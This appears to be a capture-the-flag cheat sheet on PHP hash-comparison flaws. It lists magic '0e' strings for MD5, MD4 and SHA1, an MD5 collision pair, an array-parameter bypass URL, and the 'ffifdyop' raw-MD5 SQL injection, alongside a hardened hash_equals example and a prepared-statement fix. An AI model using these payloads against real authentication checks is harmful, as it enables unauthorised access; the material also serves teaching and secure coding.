MD5 and hash-related vulnerabilities
MD5 loose comparison
<?php
if (md5($_GET['a']) == md5($_GET['b'])) {
    echo $flag;
}
?>
Two values are read in and their MD5 digests are compared; if they are equal, the flag is printed.
This is a typical loose-type (==) comparison. It can be bypassed when two conditions hold:
- The MD5 digest starts with 0e. A leading 0e is what makes PHP treat the string as a number written in scientific notation.
- Everything after the 0e is digits. For example, 0e123 == 0e234, because 0 times any power of ten is still 0.
Strings that satisfy both conditions include:
- QNKCDZO
- 240610708
- s155964671a
- s878926199a
- s214587387a
- s1885207154a
- s1836677006a
Strings whose md5(md5()) also starts with 0e:
- CbDLytmyGm2xQyaLNhWn
- 770hQgrBOjrcqftrlaZk
- 7r4lGXCH2Ksu2JNT3BYM
CbDLytmyGm2xQyaLNhWn
    md5(CbDLytmyGm2xQyaLNhWn)      => 0ec20b7c66cafbcc7d8e8481f0653d18
    md5(md5(CbDLytmyGm2xQyaLNhWn)) => 0e3a5f2a80db371d4610b8f940d296af
770hQgrBOjrcqftrlaZk
    md5(770hQgrBOjrcqftrlaZk)      => 0e689b4f703bdc753be7e27b45cb3625
    md5(md5(770hQgrBOjrcqftrlaZk)) => 0e2756da68ef740fd8f5a5c26cc45064
7r4lGXCH2Ksu2JNT3BYM
    md5(7r4lGXCH2Ksu2JNT3BYM)      => 0e269ab12da27d79a6626d91f34ae849
    md5(md5(7r4lGXCH2Ksu2JNT3BYM)) => 0e48d320b2a97ab295f5c4694759889f
Different binary data with the same MD5
Note that the two parameters below are URL-encoded; they must be sent as raw bytes, so a strict (===) comparison of the digests still passes:
md5($param1) === md5($param2)
param1=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2
param2=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2
MD4
Strings that satisfy the same two conditions for MD4:
- 0e251288019
SHA1
Strings that satisfy the same two conditions for SHA1:
- aa3OFF9m
- aaO8zKZF
- aaroZmOk
- aaK1STfY
MD5 array bypass
md5() cannot process an array: on PHP 7 it emits a warning and returns NULL (PHP 8 throws a TypeError instead). If the check looks like the following, passing two arrays makes both sides NULL and NULL === NULL is true, so an array bypasses it:
<?php
if (md5($_GET['a']) === md5($_GET['b'])) {
    echo "yes";
}
// http://127.0.0.1/1.php?a[]=1&b[]=2
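The loose check from the two sections above beside a hardened version, as an added example that is not part of the original notes; weakMd5Equal, safeMd5Equal and isMagicDigest are names chosen here, and the inputs are values listed in the notes.

```php
<?php
// Added example, not from the original notes.

// Vulnerable: == on two hex digests. PHP compares two numeric strings as
// numbers, so every digest of the form 0e<digits> evaluates to 0, and two
// unrelated inputs whose digests both start with 0e pass the check.
function weakMd5Equal($a, $b): bool
{
    return md5($a) == md5($b);
}

// Hardened: reject anything that is not a string first (on PHP 7, md5() of an
// array only warns and returns NULL, so NULL === NULL would still pass a
// strict check; PHP 8 throws a TypeError instead). Then compare the digests
// with hash_equals(), a byte-wise comparison that never coerces to numbers.
function safeMd5Equal($a, $b): bool
{
    if (!is_string($a) || !is_string($b)) {
        return false;
    }
    return hash_equals(md5($a), md5($b));
}

// Audit helper: true when a hex digest is one PHP would treat as a numeric
// string, i.e. one that compares equal to any other 0e digest under ==.
function isMagicDigest(string $hex): bool
{
    return preg_match('/^0e[0-9]+$/', $hex) === 1;
}

// Inputs taken from the notes above: both digests start with 0e.
var_dump(weakMd5Equal('QNKCDZO', '240610708'));   // loose compare of two 0e digests
var_dump(safeMd5Equal('QNKCDZO', '240610708'));   // same inputs, byte-wise compare
var_dump(safeMd5Equal(['1'], ['2']));             // the a[]=1&b[]=2 array case
var_dump(safeMd5Equal('abc', 'abc'));             // genuinely equal inputs
var_dump(isMagicDigest(md5('QNKCDZO')));          // flags the 0e digest
```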
SQL injection via MD5
ffifdyop
$pass = 'ffifdyop';
$sql = "select * from `admin` where password = '" . md5($pass, true) . "'";
With the second argument set to true, md5() returns the raw 16 bytes instead of hex. The raw digest of ffifdyop is 'or'6XXXXXXXXX' (the X's stand for garbage and non-printable bytes); concretely the bytes are 'or'6\xc9]\x99\xe9!r,\xf9\xedb\x1c. When concatenated into the query, the SQL statement becomes:
select * from `admin` where password=''or'6XXXXXXXXX'
This is an SQL injection: the WHERE clause is now '' OR '6...', and MySQL casts a string beginning with a digit to a non-zero number, which is true, so every row matches. The fix is to bind the digest as a parameter in a prepared statement rather than concatenating it into the query text.